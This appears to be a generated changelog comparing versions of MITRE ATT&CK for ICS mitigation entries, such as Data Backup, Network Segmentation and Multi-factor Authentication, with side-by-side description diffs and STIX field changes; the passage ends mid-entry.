external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0802https://attack.mitre.org/mitigations/M0802

[M0953] Data Backup

Current version: 1.0


Old Description
New Description
t1Take and store data backups from end user systems and critict1Take and store data backups from end user systems and critic
>al servers. Ensure backup and storage systems are hardened a>al servers. Ensure backup and storage systems are hardened a
>nd kept separate from the corporate network to prevent compr>nd kept separate from the corporate network to prevent compr
>omise. Maintain and exercise incident response plans, includ>omise.   Maintain and exercise incident response plans  (Cit
>ing the management of 'gold-copy' back-up images and configu>ation: Department of Homeland Security October 2009), includ
>rations for key systems to enable quick recovery and respons>ing the management of  'gold-copy' back-up images and config
>e from adversarial activities that impact control, view, or >urations for key systems to enable quick recovery and respon
>availability.>se from adversarial activities that impact control, view, or
 > availability.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CP-9', 'IEC 62443-3-3:2013 - SR 7.3', 'IEC 62443-4-2:2019 - CR 7.3']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:18:28.201000+00:002022-05-06 17:47:24.040000+00:00
descriptionTake and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans, including the management of 'gold-copy' back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of 'gold-copy' back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0953https://attack.mitre.org/mitigations/M0953
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Department of Homeland Security October 2009', 'description': 'Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ', 'url': 'https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf'}

[M0803] Data Loss Prevention

Current version: 1.0


Old Description
New Description
t1Data Loss Prevention (DLP) technologies can be used to help t1Data Loss Prevention (DLP) technologies can be used to help 
>identify adversarial attempts to exfiltrate operational info>identify adversarial attempts to exfiltrate operational info
>rmation, such as engineering plans, trade secrets, recipes, >rmation, such as engineering plans, trade secrets, recipes, 
>intellectual property, or process telemetry. DLP functionali>intellectual property, or process telemetry. DLP functionali
>ty may be built into other security products such as firewal>ty may be built into other security products such as firewal
>ls or stand alone suites running on the network and host-bas>ls or standalone suites running on the network and host-base
>ed agents. DLP may be configured to prevent the transfer of >d agents. DLP may be configured to prevent the transfer of i
>information through corporate resources such as email, web, >nformation through corporate resources such as email, web, a
>and physical media such as USB for host-based solutions.>nd physical media such as USB for host-based solutions.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
descriptionData Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or stand alone suites running on the network and host-based agents. DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.Data Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or standalone suites running on the network and host-based agents. DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0803https://attack.mitre.org/mitigations/M0803

[M0942] Disable or Remove Feature or Program

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CM-7', 'IEC 62443-3-3:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:16:04.776000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0942https://attack.mitre.org/mitigations/M0942

[M0808] Encrypt Network Traffic

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SC-8', 'IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0808https://attack.mitre.org/mitigations/M0808

[M0941] Encrypt Sensitive Information

Current version: 1.0


Old Description
New Description
t1Protect sensitive information with strong encryption.t1Protect sensitive data-at-rest with strong encryption.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SC-28', 'IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:16:44.834000+00:002022-10-24 15:09:07.609000+00:00
descriptionProtect sensitive information with strong encryption.Protect sensitive data-at-rest with strong encryption.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0941https://attack.mitre.org/mitigations/M0941

[M0938] Execution Prevention

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-3', 'IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:15:42.195000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0938https://attack.mitre.org/mitigations/M0938

[M0950] Exploit Protection

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-16', 'IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:18:55.938000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0950https://attack.mitre.org/mitigations/M0950

[M0804] Human User Authentication

Current version: 1.0


Old Description
New Description
t1The device should require that a user authenticates before tt1Require user authentication before allowing access to data o
>hey can remotely access it, or send a command to it. While s>r accepting commands to a device. While strong multi-factor 
>trong multi-factor authentication is preferrable, it is not >authentication is preferable, it is not always feasible with
>always feasible within this ICS environments. Performing str>in ICS environments. Performing strong user authentication a
>ong user authentication also requires additional security co>lso requires additional security controls and processes whic
>ntrols and processes which are often the target of related a>h are often the target of related adversarial techniques (e.
>dversarial techniques (e.g., Valid Accounts, Default Credent>g., Valid Accounts, Default Credentials). Therefore, associa
>ials). Therefore, associated ATT&CK mitigations should be co>ted ATT&CK mitigations should be considered in addition to t
>nsidered in addition to this, including Multi-factor Authent>his, including [Multi-factor Authentication](https://attack.
>ication  (M1032), Account Use Policies (M1036), Password Pol>mitre.org/mitigations/M0932), [Account Use Policies](https:/
>icies (M1027), User Account Management (M1018), Privileged A>/attack.mitre.org/mitigations/M0936), [Password Policies](ht
>ccount Management  (M1026), and User Account Control (M1052)>tps://attack.mitre.org/mitigations/M0927), [User Account Man
>.>agement](https://attack.mitre.org/mitigations/M0918), [Privi
 >leged Account Management](https://attack.mitre.org/mitigatio
 >ns/M0926), and [https://attack.mitre.org/mitigations/M1052/ 
 >User Account Control].
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - IA-2', 'IEC 62443-3-3:2013 - SR 1.1', 'IEC 62443-4-2:2019 - CR 1.1']
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
descriptionThe device should require that a user authenticates before they can remotely access it, or send a command to it. While strong multi-factor authentication is preferrable, it is not always feasible within this ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including Multi-factor Authentication (M1032), Account Use Policies (M1036), Password Policies (M1027), User Account Management (M1018), Privileged Account Management (M1026), and User Account Control (M1052).Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [https://attack.mitre.org/mitigations/M1052/ User Account Control].
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0804https://attack.mitre.org/mitigations/M0804

[M0935] Limit Access to Resource Over Network

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-3; SC-7', 'IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:15:00.027000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0935https://attack.mitre.org/mitigations/M0935

[M0934] Limit Hardware Installation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - MP-7', 'IEC 62443-3-3:2013 - SR 3.2', 'IEC 62443-4-2:2019 - EDR 3.2']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:14:12.326000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0934https://attack.mitre.org/mitigations/M0934

[M0805] Mechanical Protection Layers

Current version: 1.0


Old Description
New Description
t1Utilize a layered protection design based on physical or mect1Utilize a layered protection design based on physical or mec
>hanical protection systems to prevent damage to property, eq>hanical protection systems to prevent damage to property, eq
>uipment, human safety, or the environment. Preferably protec>uipment, human safety, or the environment. Examples include 
>tion devices should have minimal digital components to preve>interlocks, rupture disk, release values, etc. (Citation: A 
>nt exposure to related adversarial techniques. Examples of i>G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 200
>nclude interlocks, rupture disk, release values, etc. (Citat>4) 
>ion: IEC 61511) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
descriptionUtilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Preferably protection devices should have minimal digital components to prevent exposure to related adversarial techniques. Examples of include interlocks, rupture disk, release values, etc. (Citation: IEC 61511)Utilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Examples include interlocks, rupture disk, release values, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0805https://attack.mitre.org/mitigations/M0805
external_references[1]['source_name']IEC 61511A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004
external_references[1]['description']A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith. (2004). APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY — IEC 61511. Retrieved September 17, 2020.A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17

[M0806] Minimize Wireless Signal Propagation

Current version: 1.0


Old Description
New Description
t1Wireless signals frequently propagate outside of organizatiot1Wireless signals frequently propagate outside of organizatio
>nal boundaries, which provide opportunities for adversaries >nal boundaries, which provide opportunities for adversaries 
>to monitor or gain unauthorized access to the wireless commu>to monitor or gain unauthorized access to the wireless netwo
>nication. (Citation: CISA Mar 2010) To minimize this threat,>rk. (Citation: CISA March 2010) To minimize this threat, org
> organizations should implement measures to detect, understa>anizations should implement measures to detect, understand, 
>nd, and reduce unnecessary RF propagation. (Citation: DHS Na>and reduce unnecessary RF propagation. (Citation: DHS  Natio
>tional Urban Security Technology Laboratory Apr 2019) Techni>nal Urban Security Technology Laboratory April 2019)
>ques can include (i) reducing transmission power on wireless 
> signals, (ii) adjust antenna gain to prevent extensions bey 
>ond organizational boundaries, and (iii) employ RF shielding 
> techniques to block excessive signal propagation. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SC-40', 'IEC 62443-3-3:2013 - SR 1.6', 'IEC 62443-4-2:2019 - CR 1.6']
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
descriptionWireless signals frequently propagate outside of organizational boundaries, which provide opportunities for adversaries to monitor or gain unauthorized access to the wireless communication. (Citation: CISA Mar 2010) To minimize this threat, organizations should implement measures to detect, understand, and reduce unnecessary RF propagation. (Citation: DHS National Urban Security Technology Laboratory Apr 2019) Techniques can include (i) reducing transmission power on wireless signals, (ii) adjust antenna gain to prevent extensions beyond organizational boundaries, and (iii) employ RF shielding techniques to block excessive signal propagation.Wireless signals frequently propagate outside of organizational boundaries, which provide opportunities for adversaries to monitor or gain unauthorized access to the wireless network. (Citation: CISA March 2010) To minimize this threat, organizations should implement measures to detect, understand, and reduce unnecessary RF propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0806https://attack.mitre.org/mitigations/M0806
external_references[1]['source_name']CISA Mar 2010CISA March 2010
external_references[1]['description']CISA. (2010, March). Securing Wireless Networks. Retrieved September 17, 2020.CISA 2010, March Securing Wireless Networks Retrieved. 2020/09/17
external_references[2]['source_name']DHS National Urban Security Technology Laboratory Apr 2019DHS National Urban Security Technology Laboratory April 2019
external_references[2]['description']DHS National Urban Security Technology Laboratory. (2019, April). Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment. Retrieved September 17, 2020.DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17

[M0816] Mitigation Limited or Not Effective

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0816https://attack.mitre.org/mitigations/M0816

[M0932] Multi-factor Authentication

Current version: 1.0


Old Description
New Description
t1Use two or more pieces of evidence to authenticate to a systt1Use two or more pieces of evidence to authenticate to a syst
>em; such as username and password in addition to a token fro>em; such as username and password in addition to a token fro
>m a physical smart card or token generator. Within industria>m a physical smart card or token generator.  Within industri
>l control environments assets such as low-level controllers,>al control environments assets such as low-level controllers
> workstations, and HMIs have real-time operational control a>, workstations, and HMIs have real-time operational control 
>nd safety requirements which may restrict the use of multi-f>and safety requirements which may restrict the use of multi-
>actor.>factor.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - IA-2', 'IEC 62443-3-3:2013 - SR 1.7', 'IEC 62443-4-2:2019 - CR 1.7']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:14:36.319000+00:002022-10-24 15:09:07.609000+00:00
descriptionUse two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. Within industrial control environments assets such as low-level controllers, workstations, and HMIs have real-time operational control and safety requirements which may restrict the use of multi-factor.Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. Within industrial control environments assets such as low-level controllers, workstations, and HMIs have real-time operational control and safety requirements which may restrict the use of multi-factor.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0932https://attack.mitre.org/mitigations/M0932

[M0807] Network Allowlists

Current version: 1.0


Old Description
New Description
t1Network allowlists can be implemented through either host-bat1Network allowlists can be implemented through either host-ba
>sed files or system hosts files to specify what external con>sed files or system hosts files to specify what connections 
>nections (e.g., IP address, MAC address, port, protocol) can>(e.g., IP address, MAC address, port, protocol) can be made 
> be made from a device. Allowlist techniques that operate at>from a device. Allowlist techniques that operate at the  app
> the application layer (e.g., DNP3, Modbus, HTTP) are addres>lication layer (e.g., DNP3, Modbus, HTTP) are addressed in [
>sed in Filter Network Traffic mitigation.>Filter Network Traffic](https://attack.mitre.org/mitigations
 >/M0937) mitigation.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-3']
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 16:00:36.319000+00:002022-10-24 15:09:07.609000+00:00
descriptionNetwork allowlists can be implemented through either host-based files or system hosts files to specify what external connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in Filter Network Traffic mitigation.Network allowlists can be implemented through either host-based files or system hosts files to specify what connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0807https://attack.mitre.org/mitigations/M0807

[M0931] Network Intrusion Prevention

Current version: 1.0


Old Description
New Description
t1Use intrusion detection signatures to block traffic at netwot1Use intrusion detection signatures to block traffic at netwo
>rk boundaries. In industrial control environments, network i>rk boundaries.  In industrial control environments, network 
>ntrusion prevention should be configured so it will not disr>intrusion prevention should be configured so it will not dis
>upt protocols and communications responsible for real-time f>rupt protocols and communications responsible for real-time 
>unctions related to control or safety.>functions related to control or safety.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-4', 'IEC 62443-3-3:2013 - SR 6.2', 'IEC 62443-4-2:2019 - CR 6.2']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:14:02.263000+00:002022-10-24 15:09:07.609000+00:00
descriptionUse intrusion detection signatures to block traffic at network boundaries. In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.Use intrusion detection signatures to block traffic at network boundaries. In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0931https://attack.mitre.org/mitigations/M0931

[M0930] Network Segmentation

Current version: 1.0


Old Description
New Description
t1Architect sections of the network to isolate critical systemt1Architect sections of the network to isolate critical system
>s, functions, or resources. Use physical and logical segment>s, functions, or resources. Use physical and logical segment
>ation to prevent access to potentially sensitive systems and>ation to prevent access to potentially sensitive systems and
> information. Use a DMZ to contain any internet-facing servi> information. Use a DMZ to contain any internet-facing servi
>ces that should not be exposed from the internal network. Re>ces that should not be exposed from the internal network.  R
>strict network access to only required systems and services.>estrict network access to only required systems and services
> In addition, prevent systems from other networks or busines>. In addition, prevent systems from other networks or busine
>s functions (e.g., enterprise) from accessing critical proce>ss functions (e.g., enterprise) from accessing critical proc
>ss control systems. For example, in IEC 62443, systems withi>ess control systems. For example, in IEC 62443, systems with
>n the same secure level should be grouped into a 'zone', and>in the same secure level should be grouped into a zone, and 
> access to that zone is restricted by a 'conduit', or mechan>access to that zone is restricted by a conduit, or mechanism
>ism to restrict data flows between zones by segmenting the n> to restrict data flows between zones by segmenting the netw
>etwork.>ork. (Citation: IEC February 2019) (Citation: IEC August 201
 >3)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-3', 'IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:14:39.500000+00:002022-10-24 15:09:07.609000+00:00
descriptionArchitect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a 'zone', and access to that zone is restricted by a 'conduit', or mechanism to restrict data flows between zones by segmenting the network.Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a zone, and access to that zone is restricted by a conduit, or mechanism to restrict data flows between zones by segmenting the network. (Citation: IEC February 2019) (Citation: IEC August 2013)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0930https://attack.mitre.org/mitigations/M0930
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'IEC February 2019', 'description': 'IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ', 'url': 'https://webstore.iec.ch/publication/34421'}
external_references{'source_name': 'IEC August 2013', 'description': 'IEC 2013, August Industrial communication networks - Network and system security - Part 3-3: System security requirements and security levels Retrieved. 2020/09/25 ', 'url': 'https://webstore.iec.ch/publication/7033'}

[M0928] Operating System Configuration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - CM-7', 'IEC 62443-4-2:2013 - SR 7.7', 'IEC 62443-4-2:2019 - CR 7.7']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:13:45.681000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0928https://attack.mitre.org/mitigations/M0928

[M0809] Operational Information Confidentiality

Current version: 1.0


Old Description
New Description
t1Deploy mechanisms to protect the confidentiality of informatt1Deploy mechanisms to protect the confidentiality of informat
>ion related to operational processes, facility locations, de>ion related to operational processes, facility locations, de
>vice configurations, programs, or databases that may have in>vice configurations, programs, or databases that may have in
>formation that can be used to infer organizational trade-sec>formation that can be used to infer organizational trade-sec
>rets, recipes, and other intellectual property (IP). Example>rets, recipes, and other intellectual property (IP).
> mitigations could include restricting read privileges, encr 
>ypting data, and obfuscating the information (e.g., facility 
> coverterms, codenames). In many cases this information may  
>be necessary to support critical engineering, maintenance, o 
>r operational functions, therefore, it may not be feasible t 
>o implement. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['IEC 62443-3-3:2013 - SR 4.1', 'IEC 62443-4-2:2019 - CR 4.1']
values_changed
STIX FieldOld valueNew Value
modified2020-09-22 16:50:45.681000+00:002022-10-24 15:09:07.609000+00:00
descriptionDeploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP). Example mitigations could include restricting read privileges, encrypting data, and obfuscating the information (e.g., facility coverterms, codenames). In many cases this information may be necessary to support critical engineering, maintenance, or operational functions, therefore, it may not be feasible to implement.Deploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0809https://attack.mitre.org/mitigations/M0809

[M0810] Out-of-Band Communications Channel

Current version: 1.0


Old Description
New Description
t1Provide operators with redundant, out-of-band communication t1Have alternative methods to support communication requiremen
>to support monitoring and control of the operational process>ts during communication failures and data integrity attacks.
>es, especially when recovering from a network outage. (Citat> (Citation: National Institute of Standards and Technology A
>ion: NIST Apr 2013)(Citation: DARPA) Out-of-band communicati>pril 2013) (Citation: Defense Advanced Research Projects Age
>on should utilize diverse systems and technologies to minimi>ncy)
>ze common failure modes and vulnerabilities within the commu 
>nications infrastructure. For example, wireless networks (e. 
>g., 3G, 4G) can be used to provide diverse and redundant del 
>ivery of data. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SC-37']
values_changed
STIX FieldOld valueNew Value
